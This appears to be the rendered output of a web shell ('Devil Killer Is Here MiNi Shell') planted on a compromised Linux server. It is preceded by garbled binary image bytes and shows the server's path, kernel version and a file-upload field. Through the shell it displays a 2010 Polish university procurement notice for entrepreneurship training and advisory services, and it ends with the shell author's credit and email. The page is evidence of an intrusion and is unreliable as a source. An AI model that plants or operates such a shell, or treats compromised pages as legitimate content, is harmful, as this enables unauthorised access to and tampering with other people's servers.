JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/288343-N-2010.html

<p class="kh_header"><b>Szczecin: Świadczenie usług szkoleniowych oraz doradztwa podstawowego i specjalistycznego w ramach projektu pn.: Załóż Firmę - szkolenia, doradztwo i wsparcie finansowe w zakresie otwarcia i prowadzenia własnej działalności gospodarczej. Znak sprawy: ZP/R/AIP/1263/2010</b><br>
<b>Numer ogłoszenia: 288343 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zachodniopomorski Uniwersytet Technologiczny w Szczecinie , Al. Piastów 17, 70-310 Szczecin, woj. zachodniopomorskie, tel. 0-91 449 4250, 449 4042, faks 0-91 449 4690.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zut.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług szkoleniowych oraz doradztwa podstawowego i specjalistycznego w ramach projektu pn.: Załóż Firmę - szkolenia, doradztwo i wsparcie finansowe w zakresie otwarcia i prowadzenia własnej działalności gospodarczej. Znak sprawy: ZP/R/AIP/1263/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest świadczenie usług szkoleniowych, usług doradztwa podstawowego i doradztwa specjalistycznego, w ramach których przeprowadzonych zostanie 192 godziny szkoleń, 480 godzin doradztwa podstawowego i 384 godzin doradztwa specjalistycznego (w czterech edycjach) w projekcie dofinansowanym ze środków Europejskiego Funduszu Społecznego w ramach działania 6.2 Programu Operacyjnego Kapitał Ludzki pn.: Załóż Firmę - szkolenia, doradztwo i wsparcie finansowe w zakresie otwarcia i prowadzenia własnej działalności gospodarczej. 
II. Do obowiązków osób świadczących usługi w zakresie szkoleń należeć będzie:
1) Prowadzenie szkolenia z danego bloku tematycznego w terminie wyznaczonym przez Zamawiającego w siedzibie Akademickiego Inkubatora Przedsiębiorczości w Szczecinie przy ul. Janosika 8;
2) Opracowanie i przekazanie materiałów szkoleniowych zamawiającemu na podstawie, których będą przeprowadzone zajęcia. Materiały będą potwierdzeniem zakresu omówionych zagadnień;
3) Prowadzenie list obecności uczestników szkoleń i zebranie ich podpisów;
4) Przygotowanie pytań do ankiet ewaluacyjnych z danego zakresu tematycznego. Przeprowadzenie ankiet będzie odbywało się przed i po zajęciach w celu oceny poprawy poziomu wiedzy beneficjentów (uczestników) z danej dziedziny;
5) Prowadzenie karty czasu pracy zajęć;
6) Wypełnianie dzienników zajęć;
7) Dostarczenie wszystkich list obecności, ankiet, kart czasu pracy, dzienników zajęć oraz materiałów szkoleniowych do biura zamawiającego w siedzibie Akademickiego Inkubatora Przedsiębiorczości w Szczecinie przy ul. Janosika 8 niezwłocznie po zakończonych szkoleniach dla każdej edycji;
8) Szkolenia będą odbywać się z następujących bloków tematycznych:
1. Formy prowadzenia działalności - 2 godziny/edycję;
2. Prowadzenie KPiR, wystawianie faktur - 4 godziny/edycję;
3. Rynek i konkurencja - 2 godziny/edycję;
4. Sprzedaż i marketing - 4 godziny/edycję;
5. Negocjacje biznesowe - 2 godziny/edycję;
6. Rozliczanie z US i ZUS - 4 godziny/edycję;
7. Zagadnienia prawne związane z prowadzeniem firmy - 4 godziny/edycję;
8. Przygotowanie biznes planu oraz wniosków o wsparcie finansowe - 20 godzin/edycję; 
9. Rozliczenie wsparcia finansowego i dotacji - 4 godziny/edycję;
10. Przygotowanie wniosków o przyznanie podstawowego wsparcia pomostowego - 2 godziny/edycję.
9) Łączna ilość godzin szkoleń dla jednej edycji będzie wynosić 48 godzin dydaktycznych. Szkolenia prowadzone będą w czterech edycjach. 
10) Szkolenia będą odbywać się w 15 osobowych grupach dla każdej edycji, łącznie 60 uczestników;
11) Szkolenia dla 1 i 3 edycji będą prowadzone 6 dni z rzędu po 8 godzin dydaktycznych dziennie (tylko w dni powszednie);
12) W grupie 2 i 4 zajęcia będą prowadzone max. 4 razy w tygodniu po 4 godziny dydaktyczne dziennie przez 3 tygodnie (w dni powszednie po południami oraz w soboty przed południem);
13) Szkolenia dla poszczególnych edycji będą się odbywać w miesiącach:
Edycja I - listopad 2010
Edycja II - styczeń 2011
Edycja III - marzec 2011
Edycja IV - marzec 2011
14) Szkolenia będą prowadzone przy wykorzystaniu podręcznika pt: ABC small business 2010 autorstwa W. Markowskiego, które zabezpieczy zamawiający;
15) Metodologia zajęć zakłada przeprowadzenie min. 60% zajęć w formie ćwiczeń, dyskusji lub studium przypadku, a pozostałych zajęć w formie wykładów;
16) Zamawiający będzie w trakcie szkoleń przeprowadzał wizyty monitoringujące mające na celu ocenę jakości prowadzonych zajęć;
17) Pisanie biznes planów przy ubieganiu się o dotacje inwestycyjne jest bardzo istotne. Ze względu na specyfikę biznes planu jej część merytoryczna i finansowa może być prowadzona przez dwie różne osoby.
III. Do obowiązków osób świadczących usługi w zakresie doradztwa podstawowego należeć będzie:
1) Przeprowadzenie doradztwa podstawowego z danego bloku tematycznego w terminie wyznaczonym przez Zamawiającego w siedzibie Akademickiego Inkubatora Przedsiębiorczości w Szczecinie przy ul. Janosika 8;
a. Doradztwo podstawowe będzie odbywało się po zakończonym cyklu szkoleń dla danej edycji i będzie świadczone w wymiarze 8 godzin zegarowych dla każdego beneficjenta (uczestnika) z wybranego przez niego bloku tematycznego;
b. Beneficjenci (uczestnicy) będą mogli korzystać z doradztwa podstawowego do 3 tygodni od zakończenia udziału w szkoleniu;
c. Zamawiający będzie w trakcie doradztwa podstawowego przeprowadzał wizyty monitorujące mające na celu ocenę jakości prowadzonych spotkań;
d. Doradcy będą rozliczani za wykonaną pracę na podstawie list obecności uczestników projektu i kart czasu pracy;
e. Prowadzący doradztwo ma obowiązek dostarczenia wszystkich list obecności, kart czasu pracy do biura Zamawiającego w siedzibie Akademickiego Inkubatora Przedsiębiorczości w Szczecinie przy ul. Janosika 8 niezwłocznie po zakończeniu doradztwa podstawowego dla każdej edycji;
f. Doradztwo podstawowe będzie odbywać się z następujących bloków tematycznych:
1. Formy prowadzenia działalności.
2. Prowadzenie KPiR, wystawianie faktur.
3. Rynek i konkurencja. 
4. Sprzedaż i marketing.
5. Negocjacje biznesowe.
6. Rozliczanie z US i ZUS.
7. Zagadnienia prawne związane z prowadzeniem firmy. 
8. Przygotowanie biznes planu oraz wniosków o wsparcie finansowe. 
9. Rozliczenie wsparcia finansowego i dotacji. 
10. Przygotowanie wniosków o przyznanie podstawowego wsparcia pomostowego.

g. Ilość godzin doradztwa podstawowego z danego bloku tematycznego będzie ustalona przez Zamawiającego i uzależniona od potrzeb zgłaszanych przez beneficjentów tj. uczestników projektu;
h. Z doradztwa podstawowego będzie korzystało 15 osób w każdej edycji, łącznie 60 uczestników. 
IV. Do obowiązków osób świadczących usługi w zakresie doradztwa specjalistycznego należeć będzie:
1) Przeprowadzenie doradztwa specjalistycznego z danego bloku tematycznego w terminie wyznaczonym przez Zamawiającego w siedzibie Akademickiego Inkubatora Przedsiębiorczości w Szczecinie przy ul. Janosika 8;
a. Doradztwo specjalistyczne będzie świadczone w wymiarze 8 godzin zegarowych dla każdego beneficjenta (uczestnika), który założył firmę z wybranego bloku tematycznego. Ocenia się, że osób tych będzie 48, tj. 12 osób w każdej edycji;
b. Beneficjenci (uczestnicy) będą mogli korzystać z doradztwa specjalistycznego przez 12 miesięcy licząc od dnia założenia firmy;
c. Zamawiający będzie w trakcie doradztwa specjalistycznego przeprowadzał wizyty monitoringujące mające na celu ocenę jakości prowadzonych spotkań;
d. Doradcy będą rozliczani za wykonaną pracę na podstawie list obecności beneficjentów (uczestników) projektu i kart czasu pracy;
e. Prowadzący doradztwo ma obowiązek dostarczenia wszystkich list obecności, kart czasu pracy do biura Zamawiającego w siedzibie Akademickiego Inkubatora Przedsiębiorczości w Szczecinie przy ul. Janosika 8 niezwłocznie po zakończeniu doradztwa specjalistycznego dla każdej edycji;
f. Doradztwo specjalistyczne będzie odbywać się z następujących bloków tematycznych:
1. Formy prowadzenia działalności.
2. Prowadzenie KPiR, wystawianie faktur.
3. Rynek i konkurencja. 
4. Sprzedaż i marketing.
5. Negocjacje biznesowe.
6. Rozliczanie z US i ZUS.
7. Zagadnienia prawne związane z prowadzeniem firmy. 
8. Przygotowanie biznes planu oraz wniosków o wsparcie finansowe. 
9. Rozliczenie wsparcia finansowego i dotacji. 
10. Przygotowanie wniosków o przyznanie podstawowego wsparcia pomostowego.
Doradztwo specjalistyczne polegać będzie głównie na rozstrzyganiu problemów związanych z wymienionymi blokami tematycznymi, pojawiającymi się w trakcie prowadzonej już działalności gospodarczej przez beneficjentów (uczestników). Zamawiający zastrzega sobie, iż doradztwo specjalistyczne będzie prowadzone tylko w tych blokach tematycznych, na które zostaną złożone zapotrzebowania przez beneficjentów.
g. Ilość godzin doradztwa specjalistycznego z danego bloku tematycznego będzie ustalona przez Zamawiającego i uzależniona od indywidualnych potrzeb zgłaszanych przez beneficjentów (uczestników) projektu. 
V. Zamawiający zastrzega, iż jeden szkoleniowiec/ doradca nie może prowadzić szkolenia/ doradztwa z więcej niż jednego bloku tematycznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zastrzega sobie prawo (nie obowiązek) udzielenia dotychczasowemu wykonawcy - zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego na warunkach określonych w art. 67 ust. 1 pkt. 6 PZP</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 79.41.11.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu niniejszym wniesienie wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełnia warunek wskazany w dziale IV ust. 1 pkt 2) specyfikacji (posiadania niezbędnej wiedzy i doświadczenie do wykonania zamówienia), jeżeli zostaną łącznie spełnione następujące przesłanki, tj.:
1) Wykonawca wykaże (potwierdzi) zamawiającemu, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje: 
a. min. 5 usług szkoleniowych w zakresie przedsiębiorczości,
b. min. 5 usług doradczych w zakresie przedsiębiorczości.
2) Potwierdzenie (wykazanie) wykonania usług, wymaganych na podstawie pkt 1 niniejszego ustępu nastąpi poprzez przedłożenie zamawiającemu wymaganych w tym celu dokumentów, o których mowa w dziale VI ust. 2 specyfikacji. 
3) Dokumenty, o których mowa w pkt 2) niniejszego ustępu zostaną złożone zamawiającemu w terminie wyznaczonym na złożenie oferty w niniejszym postępowaniu lub, w przypadkach wskazanych w art. 26 ust. 3 PZP, dokumenty zostaną złożone zamawiającemu w dodatkowym terminie wyznaczonym przez zamawiającego;
4) Dokumenty, o których mowa w pkt 2) i 3) niniejszego ustępu zostaną złożone zamawiającemu w sposób, w języku oraz formie wymaganej Rozporządzeniem w sprawie rodzajów dokumentów;
5) W postępowaniu, w ramach wykazania spełnienia warunku, wykonawca nie złoży zamawiającemu nieprawdziwych informacji mających wpływ lub mogących mieć wpływ na wynik prowadzonego postępowania. 
6) wykonawca, który  zgodnie z art. 26 ust. 1 pkt 2b Pzp polega na wiedzy i doświadczeniu innych podmiotów wskazuje podmiot trzeci jako podwykonawcę zgodnie z treścią działu IX ust. 6 specyfikacji przywołując jaką część zamówienia powierzy podwykonawcy oraz dodatkowo w celu wykazania spełniania warunku o którym mowa w dziale IV ust. 1 pkt 2 specyfikacji, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Dokumentem potwierdzającym dysponowanie wiedzą i doświadczeniem podmiotu trzeciego będzie każdy dokument, z którego będzie wynikać zobowiązanie takiego podmiotu do udziału w wykonaniu zamówienia (np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy itd.). W sytuacji, w której wykonawca powołuje się na wiedzę i doświadczenie podmiotu trzeciego oraz gdy z okoliczności wynika, iż dla wykazania warunku dysponowania zasobami niezbędnymi do realizacji zamówienia jest konieczny udział podmiotu trzeciego, zamawiający zastrzega sobie prawo do żądania dokumentów wymienionych w dziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełnia warunek wskazany w dziale IV ust. 1 pkt 3) specyfikacji (dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia), jeżeli zostaną łącznie spełnione następujące przesłanki, tj.:
1) wykonawca wykaże (potwierdzi) zamawiającemu, że dysponuje min. 10 osobami zdolnymi do wykonania zamówienia, tj takimi które posiadają: 
a. wykształcenie wyższe magisterskie;
b. doświadczenie dydaktyczne przy prowadzeniu szkoleń lub zajęć na uczelni wyższej w zakresie prowadzenia działalności gospodarczej;
2) Potwierdzenie (wykazanie) dysponowania, wymaganą na podstawie pkt 1 niniejszego ustępu osobą nastąpi poprzez przedłożenie zamawiającemu wymaganych w tym celu dokumentów, o których mowa w dziale VI ust. 3 specyfikacji. 
3) Dokumenty, o których mowa w pkt 2) niniejszego ustępu zostaną złożone zamawiającemu w terminie wyznaczonym na złożenie oferty w niniejszym postępowaniu lub, w przypadkach wskazanych w art. 26 ust. 3 PZP, dokumenty zostaną złożone zamawiającemu w dodatkowym terminie wyznaczonym przez zamawiającego;
4) Dokumenty, o których mowa w pkt 2) i 3) niniejszego ustępu zostaną złożone zamawiającemu w sposób, w języku oraz formie wymaganej Rozporządzeniem w sprawie rodzajów dokumentów;
5) W postępowaniu, w ramach wykazania spełnienia warunku, wykonawca nie złoży zamawiającemu nieprawdziwych informacji mających wpływ lub mogących mieć wpływ na wynik prowadzonego postępowania. 
6) wykonawca, który  zgodnie z art. 26 ust. 1 pkt 2b Pzp polega na wiedzy i doświadczeniu innych podmiotów wskazuje podmiot trzeci jako podwykonawcę zgodnie z treścią działu IX ust. 6 specyfikacji przywołując jaką część zamówienia powierzy podwykonawcy oraz dodatkowo w celu wykazania spełniania warunku o którym mowa w dziale IV ust. 1 pkt 3 specyfikacji, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Dokumentem potwierdzającym dysponowanie wiedzą i doświadczeniem podmiotu trzeciego będzie każdy dokument, z którego będzie wynikać zobowiązanie takiego podmiotu do udziału w wykonaniu zamówienia (np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy itd.). W sytuacji, w której wykonawca powołuje się na wiedzę i doświadczenie podmiotu trzeciego oraz gdy z okoliczności wynika, iż dla wykazania warunku dysponowania zasobami niezbędnymi do realizacji zamówienia jest konieczny udział podmiotu trzeciego, zamawiający zastrzega sobie prawo do żądania dokumentów wymienionych w dziale VI specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne przypadki zmiany postanowień umowy oraz określenie warunków zmian określa dział XV specyfikacji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zut.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Dziale Zamówień Publicznych ZUT, 70-311 Szczecin, al. Piastów 48, Budynek Jednostek Międzywydziałowych, IV piętro, pok. 404.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 11:00, miejsce: w Dziale Zamówień Publicznych ZUT, 70-311 Szczecin, al. Piastów 48, Budynek Jednostek Międzywydziałowych, IV piętro, pok. 404 - 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonanie niniejszego zamówienia podlega współfinansowaniu ze środków Unii Europejskiej w ramach projektu pt.: Załóż Firmę - szkolenia, doradztwo i wsparcie finansowe w zakresie otwarcia i prowadzenia własnej działalności gospodarczej, realizowany w ramach działania 6.2 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com